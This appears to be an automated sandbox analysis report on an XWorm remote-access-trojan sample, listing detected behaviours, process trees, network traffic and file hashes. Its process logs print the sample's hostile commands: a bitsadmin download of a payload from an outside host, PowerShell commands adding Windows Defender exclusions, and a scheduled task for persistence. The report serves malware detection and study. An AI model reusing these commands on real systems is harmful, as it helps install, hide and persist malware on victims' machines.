Malware Analysis Report

2024-10-16 05:05

Sample ID 240802-2ncq4syand
Target XWorm V5.2.rar
SHA256 6bde76de6064f5cb941da866a26b81f18d4a7e3d738d416238fa73c0b01149a7
Tags
xworm discovery dropper execution persistence rat trojan agilenet agenttesla
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral32

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral27

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral30

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral28

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral31

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral29

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral26

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

6bde76de6064f5cb941da866a26b81f18d4a7e3d738d416238fa73c0b01149a7

Threat Level: Known bad

The file XWorm V5.2.rar was found to be: Known bad.

Malicious Activity Summary

xworm discovery dropper execution persistence rat trojan agilenet agenttesla

Xworm

Agenttesla family

Xworm family

Contains code to disable Windows Defender

AgentTesla payload

Detect Xworm Payload

Command and Scripting Interpreter: PowerShell

Download via BitsAdmin

Drops startup file

Obfuscated with Agile.Net obfuscator

Executes dropped EXE

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Unsigned PE

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Uses Task Scheduler COM API

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Scheduled Task/Job: Scheduled Task

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-02 22:43

Signatures

AgentTesla payload

Description Indicator Process Target
N/A N/A N/A N/A

Agenttesla family

agenttesla

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm family

xworm

Obfuscated with Agile.Net obfuscator

agilenet
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral9

Detonation Overview

Submitted

2024-08-02 22:43

Reported

2024-08-03 08:47

Platform

win10-20240611-en

Max time kernel

596s

Max time network

389s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Icons\Output.exe"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

Download via BitsAdmin

dropper
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\bitsadmin.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000\Software\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\AppData\\Roaming\\XClient.exe" C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\bitsadmin.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings C:\Users\Admin\AppData\Roaming\Output.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5032 wrote to memory of 4832 N/A C:\Users\Admin\AppData\Local\Temp\Icons\Output.exe C:\Users\Admin\AppData\Roaming\Output.exe
PID 5032 wrote to memory of 4832 N/A C:\Users\Admin\AppData\Local\Temp\Icons\Output.exe C:\Users\Admin\AppData\Roaming\Output.exe
PID 4832 wrote to memory of 3464 N/A C:\Users\Admin\AppData\Roaming\Output.exe C:\Windows\SysWOW64\mshta.exe
PID 4832 wrote to memory of 3464 N/A C:\Users\Admin\AppData\Roaming\Output.exe C:\Windows\SysWOW64\mshta.exe
PID 4832 wrote to memory of 3464 N/A C:\Users\Admin\AppData\Roaming\Output.exe C:\Windows\SysWOW64\mshta.exe
PID 3464 wrote to memory of 3800 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 3464 wrote to memory of 3800 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 3464 wrote to memory of 3800 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 3464 wrote to memory of 2392 N/A C:\Windows\SysWOW64\mshta.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
PID 3464 wrote to memory of 2392 N/A C:\Windows\SysWOW64\mshta.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
PID 2392 wrote to memory of 4308 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2392 wrote to memory of 4308 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2392 wrote to memory of 1904 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2392 wrote to memory of 1904 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2392 wrote to memory of 4496 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2392 wrote to memory of 4496 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2392 wrote to memory of 1312 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2392 wrote to memory of 1312 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2392 wrote to memory of 5068 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\schtasks.exe
PID 2392 wrote to memory of 5068 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\schtasks.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\Icons\Output.exe

"C:\Users\Admin\AppData\Local\Temp\Icons\Output.exe"

C:\Users\Admin\AppData\Roaming\Output.exe

"C:\Users\Admin\AppData\Roaming\Output.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\bitsadmin.exe

"C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com/XClient.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

Network

Country Destination Domain Proto
US 199.232.210.172:80 tcp
US 8.8.8.8:53 www.example.com udp
US 93.184.215.14:80 www.example.com tcp
US 8.8.8.8:53 14.215.184.93.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
US 8.8.8.8:53 10.179.89.13.in-addr.arpa udp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp

Files

memory/5032-0-0x00007FFCA16B3000-0x00007FFCA16B4000-memory.dmp

memory/5032-1-0x0000000000120000-0x000000000012E000-memory.dmp

C:\Users\Admin\AppData\Roaming\Output.exe

MD5 a731d63dc3edd963b906d0f861f7119c
SHA1 378d5339f1b675e98c81f4446f9e9ad81bc9da9f
SHA256 94e34e1ab4c0941edda34585cb048af9b4bf4a8e3e9042e3986b597b839f4dad
SHA512 39d39f34144538fa4d822aa806e0994dacc64da2358001de2b7e07400218e60302630ed28b74a3ca293a6b20cb30fadfeb342e8f5060a083753fd4674390d0a6

memory/4832-8-0x00000000001C0000-0x00000000001CC000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Output.exe.log

MD5 16c5fce5f7230eea11598ec11ed42862
SHA1 75392d4824706090f5e8907eee1059349c927600
SHA256 87ba77c13905298acbac72be90949c4fe0755b6eff9777615aa37f252515f151
SHA512 153edd6da59beea6cc411ed7383c32916425d6ebb65f04c65aab7c1d6b25443d143aa8449aa92149de0ad8a975f6ecaa60f9f7574536eec6b38fe5fd3a6c6adc

C:\Users\Admin\AppData\Roaming\Downloader.hta

MD5 f27fe2354ebb52cffbb3a8cf66c6bdb3
SHA1 439ce7924db3f534a14d78470c57c98e397969ee
SHA256 30211495aba380e4649ba7a892fea8523b0857a1db4a3be3ec59a822d385a6b4
SHA512 7e22d88538dd3d9e853002fc7caf149c047be7c17dff24061236b9a29f558d53949b2a1a46e74185e32341c1fa3e2d7b9ce3917bd5e988cd12ea380acbf33c0f

memory/4832-13-0x00007FFCA16B0000-0x00007FFCA209C000-memory.dmp

memory/2392-14-0x00000000005B0000-0x00000000005C0000-memory.dmp

memory/4308-19-0x0000017FA6930000-0x0000017FA6952000-memory.dmp

memory/4308-22-0x0000017FA6B10000-0x0000017FA6B86000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1hobfdic.qim.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 8592ba100a78835a6b94d5949e13dfc1
SHA1 63e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256 fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA512 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 570fd88ad9ac2e0fcd497beba55512f3
SHA1 c93bbbcc4195dbdcaf98eaca9b467d84f31685e1
SHA256 aa4ea6a6d5f610ceb8f6b04e1a41c2a0d158cc531e2cce41b34f26144031bb0d
SHA512 120dc925fa17f839775403dc746eb8d914ffe6e3aa491819d7e680953af489cdff9496cef5200bb4d700ae4c6b0011f70c9300b5d1d6b3ff4b33b7be5cdce750

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8d5db5da4af653d370b662c8da8475a5
SHA1 56c007fb58b7afa2d85d34e8b84c834488b6c954
SHA256 e714884e4768de2231075480203f87ec774634c51b8642c6584840bf3effee1e
SHA512 055edb94f8afc83d544f31b76f6163521b290f6e0314c10d7e043d918560eb7b9fff011f169a43b258014ffb5f19cfe073a4d3652fa87c7e79b28d930f0a32f7

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 90d8de2678e6d129181f480e9e207fd0
SHA1 a9f10994bd8c3bc0ed44794ef32853f22b45503d
SHA256 e90fca4d5dd9b7bc27ca39540471fd7223c92791c1329560dfd282fef4fb2d83
SHA512 161c0ef03fae5b5b32dfafc9003971269b06af8c0576524810d643131b4426907f43ed965eb761252f96e42722110a042d1a0aab99d9f47ff9c2502e23bdd13a

memory/4832-194-0x00007FFCA16B0000-0x00007FFCA209C000-memory.dmp

C:\Users\Admin\AppData\Roaming\XClient.exe

MD5 f065a5f352973e89b2e8d3efd79b98f8
SHA1 6a9a84e0a11010262ea35790fcdf824193805c76
SHA256 7b75950ae4eeabfdedafe9e3b14acee160a6ad932cbad66f71fe5bca32cc6405
SHA512 b920e46653ec87748767e71e88593db3c6d25fcde1b63504a1718d438e383c15578fd9e5bae5665b040e0f3512566ec99322eb8f3b5a0fa2112934ad486a2006

Analysis: behavioral22

Detonation Overview

Submitted

2024-08-02 22:43

Reported

2024-08-03 08:57

Platform

win10-20240611-en

Max time kernel

311s

Max time network

397s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Plugins\ActiveWindows.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Plugins\ActiveWindows.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 89.65.42.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

N/A

Analysis: behavioral32

Detonation Overview

Submitted

2024-08-02 22:43

Reported

2024-08-03 09:06

Platform

win10-20240404-en

Max time kernel

314s

Max time network

405s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Plugins\HVNCMemory.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Plugins\HVNCMemory.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 30.73.42.20.in-addr.arpa udp
